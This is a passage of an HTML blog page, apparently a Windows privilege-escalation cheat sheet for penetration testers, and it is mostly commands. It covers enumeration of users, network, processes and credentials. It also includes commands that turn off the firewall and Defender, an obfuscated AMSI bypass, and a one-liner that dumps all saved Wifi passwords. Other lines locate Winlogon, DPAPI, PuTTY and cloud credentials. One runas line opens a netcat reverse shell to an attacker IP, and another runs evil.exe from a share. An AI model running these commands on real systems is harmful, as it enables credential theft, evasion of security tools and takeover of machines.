osarchitecture || echo %PROCESSOR_ARCHITECTURE%</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List all env variables::</span></div><div style="text-align: left;"><span style="font-family: courier;">set</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem Env: | ft Key,Value</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List all drives::</span></div><div style="text-align: left;"><span style="font-family: courier;">wmic logicaldisk get caption || fsutil fsinfo drives</span></div><div style="text-align: left;"><span style="font-family: courier;">wmic logicaldisk get caption,description,providername</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root</span></div></code></pre><div><span style="font-family: courier; font-size: large;"><b>==Users & Groups Enumeration==</b></span></div><pre><code><div style="text-align: left;"><span style="font-family: courier;">::Get current username::</span></div><div style="text-align: left;"><span style="font-family: courier;">echo %USERNAME% || whoami</span></div><div style="text-align: left;"><span style="font-family: courier;">$env:username</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List user privilege::</span></div><div style="text-align: left;"><span style="font-family: courier;">whoami /priv</span></div><div style="text-align: left;"><span style="font-family: courier;">whoami /groups</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List all users::</span></div><div style="text-align: left;"><span style="font-family: courier;">net user</span></div><div style="text-align: left;"><span style="font-family: courier;">whoami /all</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-LocalUser | ft Name,Enabled,LastLogon</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem C:\Users -Force | select Name</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List logon requirements; useable for bruteforcing::</span></div><div style="text-align: left;"><span style="font-family: courier;">net accounts</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Get details about a user (i.e. administrator, admin, current user)::</span></div><div style="text-align: left;"><span style="font-family: courier;">net user administrator</span></div><div style="text-align: left;"><span style="font-family: courier;">net user admin</span></div><div style="text-align: left;"><span style="font-family: courier;">net user %USERNAME%</span></div><div style="text-align: left;"><span style="font-family: courier;">List all local groups</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">net localgroup</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-LocalGroup | ft Name</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Get details about a group (i.e. administrators)::</span></div><div style="text-align: left;"><span style="font-family: courier;">net localgroup administrators</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-LocalGroupMember Administrators | ft Name, PrincipalSource</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource</span></div><div><span style="font-family: courier;"><br /></span></div></code></pre><div><span style="font-family: courier; font-size: large;"><b>==Network Enumeration==</b></span></div><pre><code><div style="text-align: left;"><span style="font-family: courier;">::List all network interfaces, IP, and DNS.::</span></div><div style="text-align: left;"><span style="font-family: courier;">ipconfig /all</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-DnsClientServerAddress -AddressFamily IPv4 | ft</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::</span><span style="text-align: center;"><span style="font-family: courier;">Hosts file</span></span><span style="font-family: courier;">::</span></div><div style="text-align: left;"><span style="font-family: courier;">type C:\Windows\System32\drivers\etc\hosts</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List current routing table::</span></div><div style="text-align: left;"><span style="font-family: courier;">route print</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List the ARP table::</span></div><div style="text-align: left;"><span style="font-family: courier;">arp -A</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List all current connections::</span></div><div style="text-align: left;"><span style="font-family: courier;">netstat -ano</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List firewall state and current configuration::</span></div><div style="text-align: left;"><span style="font-family: courier;">netsh advfirewall firewall dump</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">or </span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">netsh firewall show state</span></div><div style="text-align: left;"><span style="font-family: courier;">netsh firewall show config</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List firewall's blocked ports::</span></div><div style="text-align: left;"><span style="font-family: courier;">$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Disable firewall & Defender::</span></div><div style="text-align: left;"><span style="font-family: courier;">netsh firewall set opmode disable</span></div><div style="text-align: left;"><span style="font-family: courier;">netsh advfirewall set allprofiles state off</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List all network shares::</span></div><div style="text-align: left;"><span style="font-family: courier;">net share</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::SNMP Configuration::</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse</span></div><div><span style="font-family: courier;"><br /></span></div></code></pre><div><span style="font-family: courier; font-size: large;"><b>==Windows Defender==</b></span></div><pre><code><div style="text-align: left;"><span style="font-family: courier;">::Check the status of Defender::</span></div><div style="text-align: left;"><span style="font-family: courier;">PS C:\> Get-MpComputerStatus</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Disable Real Time Monitoring</span></div><div style="text-align: left;"><span style="font-family: courier;">PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus</span></div><div style="text-align: left;"><span style="font-family: courier;">PS C:\> Set-MpPreference -DisableIOAVProtection $true</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">sc config WinDefend start= disabled</span></div><div style="text-align: left;"><span style="font-family: courier;">sc stop WinDefend</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">==AppLocker Enumeration==</span></div><div style="text-align: left;"><span style="font-family: courier;">::List of AppLocker rules::</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ApplockerPolicy -Effective -xml</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections</span></div><div style="text-align: left;"><span style="font-family: courier;">$a = Get-ApplockerPolicy -effective</span></div><div style="text-align: left;"><span style="font-family: courier;">$a.rulecollections</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">C:\> reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div></code></pre><div><span style="font-family: courier; font-size: large;"><b>==Powershell==</b></span></div><pre><code><div style="text-align: left;"><span style="font-family: courier;">::Default PowerShell locations in a Windows system.::</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\windows\syswow64\windowspowershell\v1.0\powershell</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\System32\WindowsPowerShell\v1.0\powershell</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Example of AMSI Bypass.::</span></div><div style="text-align: left;"><span style="font-family: courier;">PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Powershell history::</span></div><div style="text-align: left;"><span style="font-family: courier;">type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt</span></div><div style="text-align: left;"><span style="font-family: courier;">type C:\Users\TheShahzada\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt</span></div><div style="text-align: left;"><span style="font-family: courier;">type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</span></div><div style="text-align: left;"><span style="font-family: courier;">cat (Get-PSReadlineOption).HistorySavePath</span></div><div style="text-align: left;"><span style="font-family: courier;">cat (Get-PSReadlineOption).HistorySavePath | sls passw</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Password in Alternate Data Stream::</span></div><div style="text-align: left;"><span style="font-family: courier;">PS > Get-Item -path flag.txt -Stream *</span></div><div style="text-align: left;"><span style="font-family: courier;">PS > Get-Content -path flag.txt -Stream Flag</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div></code></pre><div><span style="font-family: courier; font-size: large;"><b>==Processes Enumeration and Tasks==</b></span></div><pre><code><div style="text-align: left;"><span style="font-family: courier;">::What processes are running?::</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">tasklist /v</span></div><div style="text-align: left;"><span style="font-family: courier;">net start</span></div><div style="text-align: left;"><span style="font-family: courier;">sc query</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-Service</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-Process</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Which processes are running as "system"?::</span></div><div style="text-align: left;"><span style="font-family: courier;">tasklist /v /fi "username eq system"</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Do you have powershell magic?::</span></div><div style="text-align: left;"><span style="font-family: courier;">REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List installed programs::</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::List services::</span></div><div style="text-align: left;"><span style="font-family: courier;">net start</span></div><div style="text-align: left;"><span style="font-family: courier;">wmic service list brief</span></div><div style="text-align: left;"><span style="font-family: courier;">tasklist /SVC</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Scheduled tasks::</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">schtasks /query /fo LIST 2>nul | findstr TaskName</span></div><div style="text-align: left;"><span style="font-family: courier;">schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Startup tasks::</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">#wmic startup get caption,command</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce</span></div><div style="text-align: left;"><span style="font-family: courier;">dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"</span></div><div style="text-align: left;"><span style="font-family: courier;">dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;"><br /></span></div></code></pre><div><span style="font-family: courier; font-size: large;"><b>==Windows Credentials==</b></span></div><pre><code><div style="text-align: left;"><span style="font-family: courier;">::Winlogon Credentials::</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">#Other way</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">/* Use the cmdkey to list the stored credentials on the machine. */</span></div><div style="text-align: left;"><span style="font-family: courier;">cmdkey /list</span></div><div style="text-align: left;"><span style="font-family: courier;">Currently stored credentials:</span></div><div style="text-align: left;"><span style="font-family: courier;"> Target: Domain:interactive=WORKGROUP\Administrator</span></div><div style="text-align: left;"><span style="font-family: courier;"> Type: Domain Password</span></div><div style="text-align: left;"><span style="font-family: courier;"> User: WORKGROUP\Administrator</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">/* Then you can use runas with the /savecred options in order to use the saved credentials. The following example is calling a remote binary via an SMB share */</span></div><div style="text-align: left;"><span style="font-family: courier;">runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">/* Using runas with a provided set of credential. */</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::DPAPI::</span></div><div style="text-align: left;"><span style="font-family: courier;">/* In theory, the Data Protection API can enable symmetric encryption of any kind of data; in practice, its primary use in the Windows operating system is to perform symmetric encryption of asymmetric private keys, using a user or system secret as a significant contribution of entropy.</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">The DPAPI key is stored in the same file as the master key that protects the users private keys. It usually is 64 bytes of random data. (Notice that this directory is protected so you cannot list it usingdir from the cmd, but you can list it from PS). */</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">/* You can use mimikatz module dpapi::masterkey with the appropriate arguments (/pvk or /rpc) to decrypt it.</span></div><div style="text-align: left;"><span style="font-family: courier;">The credentials files protected by the master password are usually located in: */</span></div><div style="text-align: left;"><span style="font-family: courier;">dir C:\Users\username\AppData\Local\Microsoft\Credentials\</span></div><div style="text-align: left;"><span style="font-family: courier;">dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Wifi::</span></div><div style="text-align: left;"><span style="font-family: courier;">#List saved Wifi using</span></div><div style="text-align: left;"><span style="font-family: courier;">netsh wlan show profile</span></div><div style="text-align: left;"><span style="font-family: courier;">#To get the clear-text password use</span></div><div style="text-align: left;"><span style="font-family: courier;">netsh wlan show profile <SSID> key=clear</span></div><div style="text-align: left;"><span style="font-family: courier;">#Oneliner to extract all wifi passwords</span></div><div style="text-align: left;"><span style="font-family: courier;">cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Saved RDP Connections::</span></div><div style="text-align: left;"><span style="font-family: courier;">HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\</span></div><div style="text-align: left;"><span style="font-family: courier;">HKCU\Software\Microsoft\Terminal Server Client\Servers\</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Recently Run Commands::</span></div><div style="text-align: left;"><span style="font-family: courier;">HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU</span></div><div style="text-align: left;"><span style="font-family: courier;">HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Remote Desktop Credential Manager::</span></div><div style="text-align: left;"><span style="font-family: courier;">%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings</span></div><div style="text-align: left;"><span style="font-family: courier;">/* Use the Mimikatz dpapi::rdg module with appropriate /masterkey to decrypt any .rdg files</span></div><div style="text-align: left;"><span style="font-family: courier;">You can extract many DPAPI masterkeys from memory with the Mimikatz sekurlsa::dpapi module */</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">:***:Files and Registry (Credentials):***:</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Putty Creds::</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Putty SSH Host Keys::</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::SSH keys in registry::</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">/* If ssh-agent service is not running and you want it to automatically start on boot run: */</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Cloud Credentials::</span></div><div style="text-align: left;"><span style="font-family: courier;">##From user home</span></div><div style="text-align: left;"><span style="font-family: courier;">.aws\credentials</span></div><div style="text-align: left;"><span style="font-family: courier;">AppData\Roaming\gcloud\credentials.db</span></div><div style="text-align: left;"><span style="font-family: courier;">AppData\Roaming\gcloud\legacy_credentials</span></div><div style="text-align: left;"><span style="font-family: courier;">AppData\Roaming\gcloud\access_tokens.db</span></div><div style="text-align: left;"><span style="font-family: courier;">.azure\accessTokens.json</span></div><div style="text-align: left;"><span style="font-family: courier;">.azure\azureProfile.json</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::SAM & SYSTEM backups::</span></div><div style="text-align: left;"><span style="font-family: courier;"># Usually %SYSTEMROOT% = C:\Windows</span></div><div style="text-align: left;"><span style="font-family: courier;">%SYSTEMROOT%\repair\SAM</span></div><div style="text-align: left;"><span style="font-family: courier;">%SYSTEMROOT%\System32\config\RegBack\SAM</span></div><div style="text-align: left;"><span style="font-family: courier;">%SYSTEMROOT%\System32\config\SAM</span></div><div style="text-align: left;"><span style="font-family: courier;">%SYSTEMROOT%\repair\system</span></div><div style="text-align: left;"><span style="font-family: courier;">%SYSTEMROOT%\System32\config\SYSTEM</span></div><div style="text-align: left;"><span style="font-family: courier;">%SYSTEMROOT%\System32\config\RegBack\system</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Unattended files::</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\sysprep\sysprep.xml</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\sysprep\sysprep.inf</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\sysprep.inf</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\Panther\Unattended.xml</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\Panther\Unattend.xml</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\Panther\Unattend\Unattend.xml</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\Panther\Unattend\Unattended.xml</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\System32\Sysprep\unattend.xml</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\System32\Sysprep\unattended.xml</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\unattend.txt</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\unattend.inf</span></div><div style="text-align: left;"><span style="font-family: courier;">dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::IIS Web Config::</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-Childitem βPath C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\inetpub\wwwroot\web.config</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">Get-Childitem βPath C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-Childitem βPath C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">/* Example of web.config with credentials: */</span></div><div style="text-align: left;"><span style="font-family: courier;"><authentication mode="Forms"> </span></div><div style="text-align: left;"><span style="font-family: courier;"> <forms name="login" loginUrl="/admin"></span></div><div style="text-align: left;"><span style="font-family: courier;"> <credentials passwordFormat = "Clear"></span></div><div style="text-align: left;"><span style="font-family: courier;"> <user name="Administrator" password="SuperAdminPassword" /></span></div><div style="text-align: left;"><span style="font-family: courier;"> </credentials></span></div><div style="text-align: left;"><span style="font-family: courier;"> </forms></span></div><div style="text-align: left;"><span style="font-family: courier;"></authentication></span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;"><br /></span></div></code></pre><div><span style="font-family: courier; font-size: large;"><b>==Write Permissions==</b></span></div><pre><code><div><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">/* Check if you can modify some config file to read some special file or if you can modify some binary that is going to be executed by an Administrator account (schedtasks).</span></div><div style="text-align: left;"><span style="font-family: courier;">A way to find weak folder/files permissions in the system is doing: */</span></div><div style="text-align: left;"><span style="font-family: courier;">accesschk.exe /accepteula </span></div><div style="text-align: left;"><span style="font-family: courier;"># Find all weak folder permissions per drive.</span></div><div style="text-align: left;"><span style="font-family: courier;">accesschk.exe -uwdqs Users c:\</span></div><div style="text-align: left;"><span style="font-family: courier;">accesschk.exe -uwdqs "Authenticated Users" c:\</span></div><div style="text-align: left;"><span style="font-family: courier;">accesschk.exe -uwdqs "Everyone" c:\</span></div><div style="text-align: left;"><span style="font-family: courier;"># Find all weak file permissions per drive.</span></div><div style="text-align: left;"><span style="font-family: courier;">accesschk.exe -uwqs Users c:\*.*</span></div><div style="text-align: left;"><span style="font-family: courier;">accesschk.exe -uwqs "Authenticated Users" c:\*.*</span></div><div style="text-align: left;"><span style="font-family: courier;">accesschk.exe -uwdqs "Everyone" c:\*.*</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"</span></div><div style="text-align: left;"><span style="font-family: courier;">icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}} </span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;"><br /></span></div></code></pre><div><span style="font-family: courier; font-size: medium;"><b>Note: Will be continue..../</b></span></div><div><span style="font-family: courier; font-size: medium;"><b><br /></b></span></div><div style="text-align: left;"><span style="font-family: courier;"><b>References:</b></span></div><div style="text-align: left;"><div><a href="https://book.hacktricks.xyz/windows/windows-local-privilege-escalation"><span style="font-family: arial; font-size: x-small;">https://book.hacktricks.xyz/windows/windows-local-privilege-escalation</span></a></div><div><a href="https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/"><span style="font-family: arial; font-size: x-small;">https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/</span></a></div><div><a href="http://www.fuzzysecurity.com/tutorials/16.html"><span style="font-family: arial; font-size: x-small;">http://www.fuzzysecurity.com/tutorials/16.html</span></a></div><div><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md"><span style="font-family: arial; font-size: 